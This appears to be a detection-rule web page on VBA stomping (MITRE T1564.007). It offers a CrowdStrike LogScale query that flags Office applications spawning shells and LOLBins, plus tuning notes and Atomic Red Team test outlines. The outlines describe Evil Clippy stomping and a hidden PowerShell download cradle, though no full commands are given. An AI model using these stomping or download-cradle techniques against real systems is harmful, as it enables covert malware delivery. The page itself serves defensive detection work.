T1564.007 CrowdStrike LogScale · LogScale

Detect VBA Stomping in CrowdStrike LogScale

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code location with null bytes, benign code, or random data while leaving previously compiled malicious p-code intact in the PerformanceCache. When the Office application version encoded in the _VBA_PROJECT stream matches the host Office version, the malicious p-code executes directly — bypassing static scanners that examine only the decompressed source code stream and may report no macros present. Tools such as Evil Clippy automate this stomping process. Since the technique defeats source-code-level analysis, detection relies primarily on behavioral indicators: Office applications spawning unexpected child processes, making suspicious outbound network connections, and writing unusual files to disk — the same runtime behaviors as conventional macro malware, but invisible to many automated pre-execution scanning tools.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1564 Hide Artifacts
Sub-technique
T1564.007 VBA Stomping
Canonical reference
https://attack.mitre.org/techniques/T1564/007/

LogScale Detection Query

CrowdStrike LogScale (LogScale)
cql 
#event_simpleName = "ProcessRollup2"
| ParentBaseFileName = /(winword|excel|powerpnt|msaccess|mspub|outlook|onenote)\.exe/i
| ImageFileName = /(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|bitsadmin|certutil|wmic)\.exe$/i
| eval risk = case {
    ImageFileName = /(powershell|pwsh|mshta|wscript)\.exe$/i : "critical";
    ImageFileName = /(cmd|bitsadmin|certutil|regsvr32)\.exe$/i : "high";
    * : "medium"
  }
| table timestamp, ComputerName, UserName, ParentBaseFileName, ImageFileName, CommandLine, risk
| sort by timestamp desc
high severity medium confidence

Detects Office applications spawning suspicious child processes via CrowdStrike Falcon telemetry.

Data Sources

CrowdStrike Falcon Process Events

Required Tables

ProcessRollup2

False Positives & Tuning

  • Finance and accounting teams using Excel macros that invoke cmd.exe or PowerShell for data export pipelines, FTP uploads, or ERP system automation
  • IT-managed Excel workbooks that launch PowerShell for SCCM inventory collection, compliance reporting, or system configuration checks
  • Developer workstations where Office VBA macros automate build, test, or deployment tasks by spawning scripts
  • Helpdesk support tooling that uses Word or Excel macros to launch remote assistance utilities or system diagnostic scripts
Download portable Sigma rule (.yml)

Other platforms for T1564.007

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1VBA Stomping with Evil Clippy

    Expected signal: Sysmon Event ID 1: powershell.exe spawned, then EvilClippy.exe spawned. Sysmon Event ID 11: file creation for df00tech_test.docm and df00tech_test_patched.docm. Sysmon Event ID 1: Word.Application COM invocation by PowerShell. No direct detection alert expected at stomping stage — this test validates that the document is created; execution detection fires in Test 2.

  2. Test 2Open Stomped Document and Verify Child Process Spawning

    Expected signal: Sysmon Event ID 1: WINWORD.EXE process created, then cmd.exe spawned as child with ParentImage=WINWORD.EXE and CommandLine containing 'echo df00tech_vba_execution_test'. Sysmon Event ID 11: file creation for df00tech_exec_marker.txt. Security Event ID 4688 (if process command line auditing enabled): cmd.exe with parent WINWORD.EXE.

  3. Test 3Verify VBA Stomping with pcodedmp and oletools

    Expected signal: Sysmon Event ID 1: pip.exe, python.exe process creations. No child process spawning from Office during this test (analysis-only). Console output from olevba will show 'AutoOpen' macro source code and p-code present — confirming both exist in the pre-stomped document. After applying Evil Clippy stomping (Test 1), re-running pcodedmp on the stomped output would show p-code with null source, confirming successful stomping.

  4. Test 4Office Macro Spawning PowerShell Download Cradle

    Expected signal: Sysmon Event ID 1: EXCEL.EXE spawns powershell.exe with ParentImage=EXCEL.EXE. CommandLine contains '-WindowStyle Hidden', '-ExecutionPolicy Bypass', 'Net.WebClient', 'DownloadString', 'IEX'. Sysmon Event ID 3: powershell.exe attempts outbound connection to 127.0.0.1:8080 (connection fails, no listener). PowerShell ScriptBlock Log Event ID 4104 captures the download cradle. Security Event ID 4688 with process command line auditing.

Last updated: 2026-03-12 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1564.007 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1564Hide Artifacts

Related Sub-techniques

T1564.001Hidden Files and DirectoriesT1564.002Hidden UsersT1564.003Hidden WindowT1564.004NTFS File AttributesT1564.005Hidden File SystemT1564.006Run Virtual InstanceT1564.008Email Hiding RulesT1564.009Resource ForkingT1564.010Process Argument SpoofingT1564.011Ignore Process InterruptsT1564.012File/Path ExclusionsT1564.013Bind MountsT1564.014Extended Attributes

Related Techniques

T1564Hide ArtifactsT1059.005Visual BasicT1059.001PowerShellT1566.001Spearphishing AttachmentT1204.002Malicious FileT1027Obfuscated Files or InformationT1027.009Embedded PayloadsT1105Ingress Tool TransferT1053.005Scheduled TaskT1547.001Registry Run Keys / Startup FolderT1562.001Disable or Modify Tools

Same Tactic: Defense Evasion

Popular Detections